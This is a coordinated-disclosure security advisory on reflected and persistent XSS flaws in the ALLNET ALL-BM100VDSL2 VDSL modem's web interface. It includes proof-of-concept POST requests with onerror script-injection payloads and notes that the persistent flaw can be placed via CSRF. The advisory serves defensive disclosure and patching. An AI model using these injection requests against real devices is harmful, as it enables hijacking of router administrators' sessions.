VDSL Client Modem ALL-BM100VDSL2: XSS

VDSL Client Modem ALL-BM100VDSL2: XSS

Date: 2017-04-13 14:13:12
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: VDSL Client Modem ALL-BM100VDSL2 C.4.6a
Fixed in: C.4.8a
Fixed Version Link: http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Vendor Website: http://www.allnet.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 12/20/2016
Disclosed to public: 04/13/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits Tim Coen & Marcus Gruber of curesec GmbH

2. Overview

The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to reflected as well as persistent XSS. A privileged user account is required to exploit the persistent XSS vulnerability but this can be bypassed via CSRF.

3. Details

Reflected XSS

CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description: Each request to the web application that performs an action that changes the server state receives as reply a generic redirect response. The target of the redirect depends on the "page" variable submitted by the user. As the variable is echoed in a HTML attribute as well as a JavaScript context without proper encoding, it is vulnerable to reflected XSS.

Proof of Concept:

Request: POST /goform/ifx_set_system_password HTTP/1.1 Host: page=system_password.html'"><img src=no onerror=alert(1)>&curr_user_id=1&submitflag=1&users=%3CNew+User%3E&userEnable=1&userNew=test3&user_passwd_edit_enable=1&userNewPswd=test&userConPswd=test&userLaccess=1&userRaccess=1&userFTPaccess=1&userSMBaccess=1 Response: <html><head> <script type="text/javascript"> location.href="/system_password.html'"><img src=no onerror=alert(1)>"; </script> </head><body> This document has moved to a new <a href="system_password.html'"><img src=no onerror=alert(1)>">location</a>. Please update your documents to reflect the new location. </body></html>

Persistent XSS

CVSS: Medium 4.3 CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

At least one field is vulnerable to persistent XSS, other values may be affected as well. A privileged user is required to place the payload, but an attacker can also use CSRF to place the payload.

Proof of Concept:

POST /goform/ifx_set_wizard_host HTTP/1.1 Host: page=system_hostname.asp&HostName=dslcpe'"><img src=no onerror=alert(1)>&DomainName=vdsl.com Visiting triggers the payload.

4. Solution

To mitigate this issue please upgrade at least to version C.4.8a:


Please note that a newer version might already be available.

5. Report Timeline

12/20/2016 Informed Vendor about Issue
12/23/2016 Vendor announces release of new firmware
02/15/2017 Reminded Vendor about disclosure date
03/01/2017 Vendor releases new Version
04/13/2017 Disclosed to public